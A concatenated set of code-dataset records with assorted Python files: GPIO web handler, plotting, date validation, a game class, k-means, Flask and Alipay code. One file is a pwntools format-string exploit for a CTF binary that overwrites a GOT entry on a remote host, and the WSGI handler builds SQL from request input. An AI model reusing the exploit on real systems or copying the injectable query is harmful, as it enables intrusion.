pilib.parseoptions(interface['options'])\n statusdict[interface['id'] + 'mode'] = options['mode']\n\n # Execute commands\n if 'action' in d:\n querylist=[]\n if d['action'] == 'toggleGPIOmode':\n pass\n elif d['action'] == 'toggleGPIOvalue':\n outputs = pilib.readalldbrows(pilib.controldatabase,'outputs')\n for output in outputs:\n if output['id'] == d['GPIOid']:\n curval = output['value']\n if curval == 0:\n setval = 1\n else:\n setval = 0\n querylist.append('update outputs set value= ' + str(setval) + ' where id=\\'' + d['GPIOid'] + '\\'')\n pilib.sqlitemultquery(pilib.controldatabase,querylist)\n\n # Refresh everything\n inputs = pilib.readalldbrows(pilib.controldatabase, 'inputs')\n interfaces = pilib.readalldbrows(pilib.controldatabase, 'interfaces')\n\n statusdict={}\n for input in inputs:\n statusdict[input['id'] + 'value'] = input['value']\n for interface in interfaces:\n if interface['type'] == 'GPIO':\n options = pilib.parseoptions(interface['options'])\n statusdict[interface['id'] + 'mode'] = options['mode']\n\n output = json.dumps(statusdict, indent=1)\n\n response_headers = [('Content-type', 'application/json')]\n start_response(status,response_headers)\n\n return [output]\n\n","sub_path":"wsgi/wsgigpioactions.wsgi","file_name":"wsgigpioactions.wsgi","file_ext":"wsgi","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"596846921","text":"from matplotlib import pyplot as plt\nfrom numpy import linspace\n\nmonitor_fps = 30\ndef test(fps):\n x = (monitor_fps/fps) % 1.0\n return (x+0.5) % 1.0 - 0.5\n\nX = [x for x in range(1, 1000)]\nY = [test(x) for x in X]\n\nplt.title(f'{monitor_fps}Hz monitor')\nplt.xlabel('fps')\nplt.ylabel('VSync drift / frame')\nplt.yticks([-0.5, -0.25, 0, 0.25, 0.5])\n\nplt.scatter(X, Y)\nplt.plot(X, Y)\nplt.show()","sub_path":"fps.py","file_name":"fps.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"540613349","text":"import re\n\ndef isLeapYear(year):\n status= False\n if (year % 4) == 0:\n if (year % 100) == 0:\n if (year % 400) == 0:\n status= True\n else:\n status= True\n return status\n\n# Test Leap Year\n# years=[2000, 1992, 1994, 1600, 1900]\n# for year in years:\n# print('{} : {}'.format(year, (True if isLeapYear(year) else False)))\n\ndef validasiTanggalLahir(arr):\n hasil={\n 'valid': [],\n 'invalid': []\n }\n\n date_pattern='^(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])$'\n\n for profil in arr:\n separator='-'\n if '/' in profil['tgl_lahir']:\n separator='/'\n elif ' ' in profil['tgl_lahir']:\n separator= ' '\n elif '.' 
in profil['tgl_lahir']:\n            separator= '.'\n        else:\n            pass\n\n        parts= profil['tgl_lahir'].split(separator)\n        tahun= int(parts[0])\n        bulan= int(parts[1])\n        hari= int(parts[2])\n\n        profil['alasan']=[]\n        bulan_31_hari=[1,3,5,7,8,10,12]\n        error=0\n\n        if not re.match(date_pattern, profil['tgl_lahir']):\n            error += 1\n\n        # check the year\n        if tahun < 1900 or tahun > 2099:\n            profil['alasan'].append('tahun di luar batas yang ditentukan')\n            error+= 1\n\n        # check the month\n        if bulan > 12:\n            profil['alasan'].append('bulan di luar batas yang ditentukan')\n            error+= 1\n\n        # check the day for \"February\", taking leap years into account\n        if bulan == 2 and isLeapYear(tahun) == False and hari > 28:\n            profil['alasan']=['penunjuk hari dalam bulan terkait tidak valid (cek aturan tahun kabisat)']\n            error+=1\n\n        # check the day for months other than \"February\"\n        if bulan != 2 and bulan <= 12:\n            # check months that may not have more than 30 days\n            if hari > 31:\n                profil['alasan'].append('hari di luar batas yang ditentukan')\n                error+=1\n            else:\n                if hari > 30 and bulan not in bulan_31_hari:\n                    profil['alasan'].append('hari di luar batas yang ditentukan')\n                    error+=1\n\n        # categorize the result\n        if error == 0:\n            hasil['valid'].append(profil)\n        else:\n            hasil['invalid'].append(profil)\n    \n    return hasil\n\n# Driver Code\nprint(validasiTanggalLahir([\n    {'nama':'Jane Doe', 'tgl_lahir': '1992-10-31'},\n    {'nama':'Jack Doe', 'tgl_lahir': '1997-02-29'},\n    {'nama':'Donny Doe', 'tgl_lahir': '1988-12-01'}\n])) \n\n'''\n{\n    'valid': [\n        {'alasan': [], 'tgl_lahir': '1992-10-31', 'nama': 'Jane Doe'}, \n        {'alasan': [], 'tgl_lahir': '1988-12-01', 'nama': 'Donny Doe'}\n    ], \n    'invalid': [\n        {'alasan': ['penunjuk hari dalam bulan terkait tidak valid (cek aturan tahun kabisat)'], 'tgl_lahir': '1997-02-29', 'nama': 'Jack Doe'}\n    ]\n} \n'''\n\nprint(validasiTanggalLahir([\n    {'nama':'Bayu Aji', 'tgl_lahir': '1983-04-31'},\n    {'nama':'Tia Nugroho', 'tgl_lahir': '1984-08-29'},\n    {'nama':'Ariel Bayu', 'tgl_lahir': '1988-07-32'}\n]))\n\n'''\n{\n    'valid': [\n        {'nama': 'Tia Nugroho', 'alasan': [], 'tgl_lahir': '1984-08-29'}\n    ], \n    'invalid': [\n        {'nama': 'Bayu Aji', 'alasan': ['hari di luar batas yang ditentukan'], 'tgl_lahir': '1983-04-31'}, \n        {'nama': 'Ariel Bayu', 'alasan': ['hari di luar batas yang ditentukan'], 'tgl_lahir': '1988-07-32'}\n    ]\n} \n'''\n\nprint(validasiTanggalLahir([\n    {'nama':'Tulus Saputra', 'tgl_lahir': '2100-05-31'},\n    {'nama':'Sumitro Doe', 'tgl_lahir': '2002-13-31'},\n    {'nama':'Juni Talira', 'tgl_lahir': '2001-09-12'}\n])) \n\n'''\n{\n    'invalid': [\n        {'tgl_lahir': '2100-05-31', 'nama': 'Tulus Saputra', 'alasan': ['tahun di luar batas yang ditentukan']},\n        {'tgl_lahir': '2002-13-31', 'nama': 'Sumitro Doe', 'alasan': ['bulan di luar batas yang ditentukan']}\n    ], \n    'valid': [\n        {'tgl_lahir': '2001-09-12', 'nama': 'Juni Talira', 'alasan': []}\n    ]\n} \n'''\n","sub_path":"python/10-regex/4-validasi-login-simple.py","file_name":"4-validasi-login-simple.py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"466190448","text":"from config import GRID_CONFIG, PLAYER_CONFIG\nimport os\n\n\nclass Person:\n    '''Characteristics of a person'''\n\n    def __init__(self, name, height, width, speed):\n        '''Constructor for person objects'''\n        self.name = name\n        self.height = height\n        self.width = width\n        self.speed = speed\n        self.pos = {'x': 0, 'y': (GRID_CONFIG['HEIGHT'] - 1)}\n        self.gravity = True\n        self.surface = GRID_CONFIG['HEIGHT'] - 1\n        self.base = GRID_CONFIG['ACTUAL_HEIGHT'] - 1\n        self.max_jump = self.height * 2\n        self.jump_from = self.base\n\n    def move(self):\n        '''Function to be overridden by child classes'''\n        pass\n\n    def createMe(self, scene=None, code=None):\n        '''Function to create the Player on the board'''\n        if scene is None:\n            return\n        if code is None:\n            return\n        for i in range(self.pos['y'], self.pos['y'] - self.height, -1):\n            for j in range(self.width):\n                scene._grid[i][self.pos['x']+j] = code\n\n    def clearMe(self, scene=None):\n        '''Function to clear the Player on the board'''\n        if scene is None:\n            return\n        for i in range(self.pos['y'], self.pos['y'] - self.height, -1):\n            for j in range(self.width):\n                scene._grid[i][self.pos['x']+j] = GRID_CONFIG['CODE']['BLANK']\n\n    def showMe(self, action=None, scene=None):\n        '''Function to show the player on the grid when scene map is rendered'''\n        if scene is not None:\n            self.clearMe(scene=scene)\n            if action is not None:\n                self.move(action=action, scene=scene)\n            else:\n                self.move(scene=scene)\n            self.createMe(scene=scene)\n\n    def check_surround(self, scene=None, pos=None):\n        '''Check for ragging'''\n        for i in range(pos['y'], pos['y'] - self.height, -1):\n            for j in range(self.width):\n                if (scene._grid[i][pos['x']+j] != GRID_CONFIG['CODE']['BLANK'] and scene._grid[i][pos['x']+j] != GRID_CONFIG['CODE']['CLOUD'] and scene._grid[i][pos['x']+j] != GRID_CONFIG['CODE']['EXIT'] and scene._grid[i][pos['x']+j] != GRID_CONFIG['CODE']['GRASS'] and scene._grid[i][pos['x']+j] != GRID_CONFIG['CODE']['COIN']) or scene._grid[i][pos['x']+j] == GRID_CONFIG['CODE']['PLAYER']:\n                    self.check_clash(scene=scene, y=i, x=pos['x']+j, pos=pos)\n                    return False\n                if self.name == 'Mario' and scene._grid[i][pos['x']+j] == GRID_CONFIG['CODE']['COIN']:\n                    for coin in scene.coins:\n                        if coin.x == (pos['x'] + j) and coin.y == i:\n                            coin.collected(scene=scene)\n                            scene.coins.remove(coin)\n                            os.system(\"aplay -q Sounds/coin.wav &\")\n                            # scene.numCoins -= 1\n                            self.score += 1000\n\n        return True\n\n    def check_clash(self, scene=None, y=None, x=None, pos=None):\n        '''Check for clashes between player and other entities'''\n        if self.pos['y'] == pos['y']:\n            if self.name == 'Mario':\n                if scene._grid[y][x] == GRID_CONFIG['CODE']['ENEMY']:\n                    PLAYER_CONFIG['LIVES_LOST'] += 1\n\n                    # Sound for losing a life\n                    os.system(\"aplay -q Sounds/bump.wav &\")\n\n            elif self.name == 'Enemy':\n                if scene._grid[y][x] == GRID_CONFIG['CODE']['PLAYER']:\n                    PLAYER_CONFIG['LIVES_LOST'] += 1\n                    os.system(\"aplay -q Sounds/bump.wav &\")\n        elif self.pos['y'] != pos['y']:\n            if self.name == 'Mario':\n                for i in range(scene.numEnemies):\n                    for j in range(x, x + PLAYER_CONFIG['SIZE'], 1):\n                        if scene.enemies[i].pos['x'] in range(x, x + PLAYER_CONFIG['SIZE'], 1) and (scene._grid[y+1][j] == GRID_CONFIG['CODE']['ENEMY']):\n                            os.system(\"aplay -q Sounds/kill.wav &\")\n                            scene.enemies[i].lives -= 1\n                            self.score += 1000\n                            break\n                    if scene.enemies[i].lives == 0:\n                        break\n","sub_path":"person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"53193447","text":"import numpy as np\nimport logging\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\n\nfrom .results import Results\n\nlogger = logging.getLogger(__name__)\n\n\nclass KmeansResults(Results):\n    \"\"\"\n    Contains results and metadata of a k-means refinement calculation\n    \"\"\"\n    def reset(self):\n        self.k_value = None\n        self.var_list = None\n        self.cl_mean_centroids = None\n\n\nclass Kmeans(object):\n    def __init__(self,\n                 Z,\n                 row_clusters,\n                 col_clusters,\n                 n_row_clusters,\n                 n_col_clusters,\n                 k_range,\n                 kmean_max_iter=100,\n                 var_thres=2.,\n                 output_filename=''):\n        \"\"\"\n        Set up Kmeans object.\n\n        :param Z: m x n matrix of spatial-temporal data. Usually each row is a\n        time-series of a spatial grid.\n        :type Z: class:`numpy.ndarray`\n        :param row_clusters: m x 1 row cluster array.\n        :type row_clusters: class:`numpy.ndarray`\n        :param col_clusters: n x 1 column cluster array.\n        :type col_clusters: class:`numpy.ndarray`\n        :param n_row_clusters: number of row clusters\n        :type n_row_clusters: int\n        :param n_col_clusters: number of column clusters\n        :type n_col_clusters: int\n        :param k_range: range of the number of clusters, i.e. value \"k\"\n        :type k_range: range\n        :param kmean_max_iter: maximum number of iterations of the KMeans\n        :type kmean_max_iter: int\n        :param var_thres: threshold of the sum of variance to select k\n        :type var_thres: float\n        :param output_filename: name of the file where to write the results\n        :type output_filename: str\n        \"\"\"\n        # Input parameters -----------------\n        self.row_clusters = row_clusters\n        self.col_clusters = col_clusters\n        self.n_row_clusters = n_row_clusters\n        self.n_col_clusters = n_col_clusters\n        self.k_range = list(k_range)\n        self.kmean_max_iter = kmean_max_iter\n        self.var_thres = var_thres\n        self.output_filename = output_filename\n        # Input parameters end -------------\n\n        # store input parameters in results object\n        self.results = KmeansResults(**self.__dict__)\n\n        self.Z = Z\n\n        if len(np.unique(row_clusters)) > n_row_clusters:\n            print('Setting \"n_row_clusters\" to {}, \\\n            according to the number of unique elements in \"row_clusters\".'.\n                  format(len(np.unique(row_clusters))))\n            self.n_row_clusters = len(np.unique(row_clusters))\n\n        if len(np.unique(col_clusters)) > n_col_clusters:\n            print('Setting \"n_col_clusters\" to {}, \\\n            according to the number of unique elements in \"col_clusters\".'.\n                  format(len(np.unique(col_clusters))))\n            self.n_col_clusters = len(np.unique(col_clusters))\n\n    def compute(self):\n        \"\"\"\n        Compute statistics for each clustering group.\n        Then loop through the range of k values,\n        and compute the sum of variances of each k.\n        Finally select the smallest k which gives\n        the sum of variances smaller than the threshold.\n\n        :return: k-means result object\n        \"\"\"\n        # Get statistic measures\n        self._compute_statistic_measures()\n\n        # Search for value k\n        var_list = np.array([])  # List of variance of each k value\n        kmeans_cc_list = []\n        for k in self.k_range:\n            # Compute Kmean\n            kmeans_cc = KMeans(n_clusters=k, max_iter=self.kmean_max_iter).fit(\n                self.stat_measures_norm)\n            var_list = np.hstack((var_list, self._compute_sum_var(kmeans_cc)))\n            kmeans_cc_list.append(kmeans_cc)\n        idx_k = min(np.where(var_list < self.var_thres)[0])\n        self.results.var_list = var_list\n        self.results.k_value = self.k_range[idx_k]\n        self.kmeans_cc = kmeans_cc_list[idx_k]\n        del kmeans_cc_list\n\n        # Scale back centroids of the \"mean\" dimension\n        centroids_norm = self.kmeans_cc.cluster_centers_[:, 0]\n        stat_max = np.nanmax(self.stat_measures[:, 0])\n        stat_min = np.nanmin(self.stat_measures[:, 0])\n        mean_centroids = centroids_norm * (stat_max - stat_min) + stat_min\n\n        # Assign centroids to each cluster cell\n        cl_mean_centroids = mean_centroids[self.kmeans_cc.labels_]\n\n        # Reshape the centroids of means to the shape of cluster matrix,\n        # taking into account non-constructive row/col cluster\n        self.results.cl_mean_centroids = np.full(\n            (self.n_row_clusters, 
self.n_col_clusters), np.nan)\n idx = 0\n for r in np.unique(self.row_clusters):\n for c in np.unique(self.col_clusters):\n self.results.cl_mean_centroids[r, c] = cl_mean_centroids[idx]\n idx = idx + 1\n\n self.results.write(filename=self.output_filename)\n return self.results\n\n def _compute_statistic_measures(self):\n \"\"\"\n Compute 6 statistics: Mean, STD, 5 percentile, 95 percentile, maximum\n and minimum values, for each co-cluster group.\n Normalize them to [0, 1]\n \"\"\"\n self.stat_measures = np.empty([0, 6])\n # Loop per co-cluster cell\n for r in np.unique(self.row_clusters):\n for c in np.unique(self.col_clusters):\n idx_rows = np.where(self.row_clusters == r)[0]\n idx_col = np.where(self.col_clusters == c)[0]\n # All elements in Z falling into this cluster cell\n cl_Z = self.Z[idx_rows, :][:, idx_col]\n\n cl_stat = np.array([\n np.nanmean(cl_Z),\n np.nanstd(cl_Z),\n np.nanpercentile(cl_Z, 5),\n np.nanpercentile(cl_Z, 95),\n np.nanmax(cl_Z),\n np.nanmin(cl_Z)\n ])\n\n self.stat_measures = np.vstack((self.stat_measures, cl_stat))\n\n # Normalize all statistic measures to [0, 1]\n self.stat_measures_norm = []\n descale = []\n for sm in self.stat_measures.T:\n minimum = np.nanmin(sm, axis=0)\n maximum = np.nanmax(sm, axis=0)\n sm_norm = np.divide((sm - minimum), (maximum - minimum))\n self.stat_measures_norm.append(sm_norm)\n\n self.stat_measures_norm = np.array(self.stat_measures_norm).T\n\n def _compute_sum_var(self, kmeans_cc):\n \"\"\"\n Compute the sum of squared variance of each Kmean cluster\n \"\"\"\n\n # Compute the sum of variance of all points\n var_sum = np.sum((self.stat_measures_norm -\n kmeans_cc.cluster_centers_[kmeans_cc.labels_])**2)\n\n return var_sum\n\n def plot_elbow_curve(self, output_plot='./kmean_elbow_curve.png'):\n \"\"\"\n Export elbow curve plot\n \"\"\"\n k_range = self.results.input_parameters['k_range']\n var_thres = self.results.input_parameters['var_thres']\n plt.plot(k_range, self.results.var_list) # kmean curve\n plt.plot([min(k_range), max(k_range)],\n [var_thres, var_thres],\n color='r',\n linestyle='--') # Threshold\n plt.plot([self.results.k_value, self.results.k_value],\n [min(self.results.var_list), max(self.results.var_list)],\n color='g',\n linestyle='--') # Selected k\n xtick_step = int((max(k_range) - min(k_range)) / 6)\n ytick_step = int((max(self.results.var_list)\n - min(self.results.var_list)) / 6)\n plt.xticks(range(min(k_range), max(k_range), xtick_step))\n plt.xlim(min(k_range), max(k_range))\n plt.ylim(min(self.results.var_list), max(self.results.var_list))\n plt.text(max(k_range) - 2 * xtick_step,\n var_thres + ytick_step / 4,\n 'threshold={}'.format(var_thres),\n color='r',\n fontsize=12)\n plt.text(self.results.k_value + xtick_step / 4,\n max(self.results.var_list) - ytick_step,\n 'k={}'.format(self.results.k_value),\n color='g',\n fontsize=12)\n plt.xlabel('k value', fontsize=20)\n plt.ylabel('Sum of variance', fontsize=20)\n plt.grid(True)\n plt.savefig(output_plot,\n format='png',\n transparent=True,\n bbox_inches=\"tight\")\n","sub_path":"cgc/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":8527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"310378295","text":"from flask import Blueprint,render_template,redirect,url_for,request,flash\nfrom app.models import Post\n\n\n\n\nblog = Blueprint('blog',__name__)\n@blog.route('/post')\ndef post():\n post_id = request.args.get('post_id')\n if post_id:\n post = 
Post.query.filter_by(id=int(post_id)).first()\n        return render_template('blog/post.html',post=post,title='BingYm | '+post.post_title)\n    else:\n        return redirect(url_for('blog_index',page=1))","sub_path":"vs/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"74163287","text":"# coding=utf-8\nimport yaml\n\n\n# Read the variables for the corresponding environment\ndef load_environment():\n    with open('params.yaml', encoding='utf-8') as f:\n        x = yaml.load(f, Loader=yaml.SafeLoader)\n        if x['active'] == 'dev':\n            return x['dev']\n        elif x['active'] == 'prev':\n            return x['prev']\n        elif x['active'] == 'prod':\n            return x['prod']\n\n\nif __name__ == '__main__':\n    res = load_environment()\n    print(res)\n    print(type(res))\n","sub_path":"Module/code/section_20/params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"275343604","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# \nfrom pwn import *\ncontext.log_level = 'debug'\ncontext.terminal = ['deepin-terminal', '-x', 'sh', '-c']\nlocal = 0\n\n\nif local:\n    io = process('./believeMe')\n    raw_input(\"debug -> \")\n    # gdb.attach(io, 'b * 0x80487cc') \n    \nelse:\n    io = remote('18.223.228.52', 13337)\n    \nelf = ELF('./believeMe')\ntarget = elf.sym['noxFlag']\n# 08 04 86 7b\n# 7b 86 04 08\n# the plt segment belongs to the code segment, so it is not writable\n# fflush_plt = elf.plt['fflush']\n# 0x804 84d0\n# payload = p32(fflush_plt) + '%' + str((target & 0xffff)-4) + 'c%9$hn'\nstack_fail = elf.got['__stack_chk_fail']\ncanary = 0xffffdd0c\npayload = p32(stack_fail) + p32(canary)+ '%' + str((target & 0xffff) - 8) + 'c%9$hn%10$hhn'\n\n\n\n\nio.recvuntil('????')\nio.sendline(payload)\nio.interactive()\nio.close()\n","sub_path":"others/nox-believeMe/exp_believe.py","file_name":"exp_believe.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"424096716","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass AlipayCloudCloudbaseFunctionLayerBindModel(object):\n\n    def __init__(self):\n        self._biz_app_id = None\n        self._biz_env_id = None\n        self._function_name = None\n        self._layer_name = None\n        self._layer_version_name = None\n\n    @property\n    def biz_app_id(self):\n        return self._biz_app_id\n\n    @biz_app_id.setter\n    def biz_app_id(self, value):\n        self._biz_app_id = value\n    @property\n    def biz_env_id(self):\n        return self._biz_env_id\n\n    @biz_env_id.setter\n    def biz_env_id(self, value):\n        self._biz_env_id = value\n    @property\n    def function_name(self):\n        return self._function_name\n\n    @function_name.setter\n    def function_name(self, value):\n        self._function_name = value\n    @property\n    def layer_name(self):\n        return self._layer_name\n\n    @layer_name.setter\n    def layer_name(self, value):\n        self._layer_name = value\n    @property\n    def layer_version_name(self):\n        return self._layer_version_name\n\n    @layer_version_name.setter\n    def layer_version_name(self, value):\n        self._layer_version_name = value\n\n\n    def to_alipay_dict(self):\n        params = dict()\n        if self.biz_app_id:\n            if hasattr(self.biz_app_id, 'to_alipay_dict'):\n                params['biz_app_id'] = self.biz_app_id.to_alipay_dict()\n            else:\n                params['biz_app_id'] = self.biz_app_id\n        if self.biz_env_id:\n            if hasattr(self.biz_env_id, 'to_alipay_dict'):\n                params['biz_env_id'] = 
self.biz_env_id.to_alipay_dict()\n else:\n params['biz_env_id'] = self.biz_env_id\n if self.function_name:\n if hasattr(self.function_name, 'to_alipay_dict'):\n params['function_name'] = self.function_name.to_alipay_dict()\n else:\n params['function_name'] = self.function_name\n if self.layer_name:\n if hasattr(self.layer_name, 'to_alipay_dict'):\n params['layer_name'] = self.layer_name.to_alipay_dict()\n else:\n params['layer_name'] = self.layer_name\n if self.layer_version_name:\n if hasattr(self.layer_version_name, 'to_alipay_dict'):\n params['layer_version_name'] = self.layer_version_name.to_alipay_dict()\n else:\n params['layer_version_name'] = self.layer_version_name\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = AlipayCloudCloudbaseFunctionLayerBindModel()\n if 'biz_app_id' in d:\n o.biz_app_id = d['biz_app_id']\n if 'biz_env_id' in d:\n o.biz_env_id = d['biz_env_id']\n if 'function_name' in d:\n o.function_name = d['function_name']\n if 'layer_name' in d:\n o.layer_name = d['layer_name']\n if 'layer_version_name' in d:\n o.layer_version_name = d['layer_version_name']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/AlipayCloudCloudbaseFunctionLayerBindModel.py","file_name":"AlipayCloudCloudbaseFunctionLayerBindModel.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"431788585","text":"import argparse\nimport itertools\nimport os\nimport random\nimport sys\nimport json\n\nimport torch\nimport torchvision\n\nfrom torch.utils.data import DataLoader\nfrom torchvision.datasets import CIFAR10\n\nfrom cs236781.train_results import FitResult\nimport training\n\n\ndef run_experiment(run_name, out_dir='./results', seed=None, device=None,\n # Training params\n bs_train=128, bs_test=None, batches=100, epochs=100,\n early_stopping=3, checkpoints=None, lr=1e-3, reg=1e-3,\n # Model params\n filters_per_layer=[64], layers_per_block=2, pool_every=2,\n hidden_dims=[1024], model_type='cnn',\n **kw):\n \"\"\"\n Executes a single run of a Part3 experiment with a single configuration.\n\n These parameters are populated by the CLI parser below.\n See the help string of each parameter for it's meaning.\n \"\"\"\n if not seed:\n seed = random.randint(0, 2 ** 31)\n torch.manual_seed(seed)\n if not bs_test:\n bs_test = max([bs_train // 4, 1])\n cfg = locals()\n\n tf = torchvision.transforms.ToTensor()\n ds_train = CIFAR10(root=DATA_DIR, download=True, train=True, transform=tf)\n ds_test = CIFAR10(root=DATA_DIR, download=True, train=False, transform=tf)\n\n if not device:\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n # Select model class\n if model_type not in MODEL_TYPES:\n raise ValueError(f\"Unknown model type: {model_type}\")\n model_cls = MODEL_TYPES[model_type]\n\n # TODO: Train\n # - Create model, loss, optimizer and trainer based on the parameters.\n # Use the model you've implemented previously, cross entropy loss and\n # any optimizer that you wish.\n # - Run training and save the FitResults in the fit_res variable.\n # - The fit results and all the experiment parameters will then be saved\n # for you automatically.\n fit_res = None\n # ====== YOUR CODE: ======\n x0, _ = ds_train[0]\n model = model_cls(x0.shape, 10, sorted(filters_per_layer * layers_per_block), pool_every, hidden_dims)\n model = model.to(device)\n loss = torch.nn.CrossEntropyLoss()\n\n optimizer = torch.optim.Adam(model.parameters(), lr=lr, 
weight_decay=10*reg)\n trainer = training.TorchTrainer(model, loss, optimizer, device)\n\n dl_train = DataLoader(ds_train, bs_train, shuffle=False)\n dl_test = DataLoader(ds_test, bs_test, shuffle=False)\n fit_res = trainer.fit(dl_train=dl_train, dl_test=dl_test,\n early_stopping=early_stopping,\n checkpoints=checkpoints, num_epochs=epochs, max_batches=batches)\n # ========================\n\n save_experiment(run_name, out_dir, fit_res)\n\n\ndef save_experiment(run_name, out_dir, fit_res):\n output = dict(\n results=fit_res._asdict()\n )\n\n output_filename = f'{os.path.join(out_dir, run_name)}.json'\n os.makedirs(out_dir, exist_ok=True)\n with open(output_filename, 'w') as f:\n json.dump(output, f, indent=2)\n\n print(f'*** Output file {output_filename} written')\n\n\ndef load_experiment(filename):\n with open(filename, 'r') as f:\n output = json.load(f)\n\n fit_res = FitResult(**output['results'])\n\n return fit_res\n\n\ndef parse_cli():\n p = argparse.ArgumentParser(description='CS236781 HW2 Experiments')\n sp = p.add_subparsers(help='Sub-commands')\n\n # Experiment config\n sp_exp = sp.add_parser('run-exp', help='Run experiment with a single '\n 'configuration')\n sp_exp.set_defaults(subcmd_fn=run_experiment)\n sp_exp.add_argument('--run-name', '-n', type=str,\n help='Name of run and output file', required=True)\n sp_exp.add_argument('--out-dir', '-o', type=str, help='Output folder',\n default='./results', required=False)\n sp_exp.add_argument('--seed', '-s', type=int, help='Random seed',\n default=None, required=False)\n sp_exp.add_argument('--device', '-d', type=str,\n help='Device (default is autodetect)',\n default=None, required=False)\n\n # # Training\n sp_exp.add_argument('--bs-train', type=int, help='Train batch size',\n default=128, metavar='BATCH_SIZE')\n sp_exp.add_argument('--bs-test', type=int, help='Test batch size',\n metavar='BATCH_SIZE')\n sp_exp.add_argument('--batches', type=int,\n help='Number of batches per epoch', default=100)\n sp_exp.add_argument('--epochs', type=int,\n help='Maximal number of epochs', default=100)\n sp_exp.add_argument('--early-stopping', type=int,\n help='Stop after this many epochs without '\n 'improvement', default=3)\n sp_exp.add_argument('--checkpoints', type=int,\n help='Save model checkpoints to this file when test '\n 'accuracy improves', default=None)\n sp_exp.add_argument('--lr', type=float,\n help='Learning rate', default=1e-3)\n sp_exp.add_argument('--reg', type=float,\n help='L2 regularization', default=1e-3)\n\n # # Model\n sp_exp.add_argument('--filters-per-layer', '-K', type=int, nargs='+',\n help='Number of filters per conv layer in a block',\n metavar='K', required=True)\n sp_exp.add_argument('--layers-per-block', '-L', type=int, metavar='L',\n help='Number of layers in each block', required=True)\n sp_exp.add_argument('--pool-every', '-P', type=int, metavar='P',\n help='Pool after this number of conv layers',\n required=True)\n sp_exp.add_argument('--hidden-dims', '-H', type=int, nargs='+',\n help='Output size of hidden linear layers',\n metavar='H', required=True)\n sp_exp.add_argument('--model-type', '-M',\n choices=MODEL_TYPES.keys(),\n default='cnn', help='Which model instance to create')\n\n parsed = p.parse_args()\n\n if 'subcmd_fn' not in parsed:\n p.print_help()\n sys.exit()\n return parsed\n\n\nif __name__ == '__main__':\n parsed_args = parse_cli()\n subcmd_fn = parsed_args.subcmd_fn\n del parsed_args.subcmd_fn\n print(f'*** Starting {subcmd_fn.__name__} with config:\\n{parsed_args}')\n 
subcmd_fn(**vars(parsed_args))\n","sub_path":"experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":6540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"101134156","text":"def search(nums, target):\n    '''\n    A rotated sorted array has a useful property: splitting it at the midpoint\n    yields one sorted array and one rotated (circularly sorted) array.\n\n    If the first element is <= the middle element, the first half is sorted and\n    the second half is the rotated part; otherwise the second half is sorted\n    and the first half is the rotated part. If the target is in the sorted\n    half, find it with binary search; otherwise set the boundaries to the\n    rotated half and keep searching with the same method.\n    '''\n\n    if not nums:\n        return -1\n\n    mid = len(nums) >> 1\n\n    if nums[0] <= nums[mid]:\n        # first half nums[:mid + 1] is sorted\n        res = bserch(nums[:mid + 1], target)\n        if res:\n            return res - 1\n        sub = search(nums[mid + 1:], target)\n        return -1 if sub == -1 else mid + 1 + sub\n    else:\n        # second half nums[mid:] is sorted\n        res = bserch(nums[mid:], target)\n        if res:\n            return mid + res - 1\n        return search(nums[:mid], target)\n\ndef bserch(arr, val):\n    low = 0\n    high = len(arr) - 1\n    while low <= high:\n        mid = low + ((high - low) >> 1)\n        if val < arr[mid]:\n            high = mid - 1\n        if val > arr[mid]:\n            low = mid + 1\n        if val == arr[mid]:\n            # index + 1, so that 0 can signal \"not found\"\n            return mid + 1\n    return 0\n\nnums=[4,5,6,7,0,1,2,3]\ntarget=2\nprint(search(nums, target))","sub_path":"learn_notes/leetcode/round_list.py","file_name":"round_list.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"380639552","text":"from json import loads\nfrom requests import get\nfrom jmespath import search\nfrom heapq import nsmallest, nlargest\nfrom more_itertools import chunked\n\nJSON_LINK = loads(get(\"https://json-stat.org/samples/oecd.json\").text)\nYEARS = list(search('dimension.year.category.index', JSON_LINK).keys())\nCOUNTRIES = search('dimension.area.category.label.*', JSON_LINK)\n\n# The idea: the number of chunks == the number of years,\n# and the number of values in each chunk == the number of countries. 
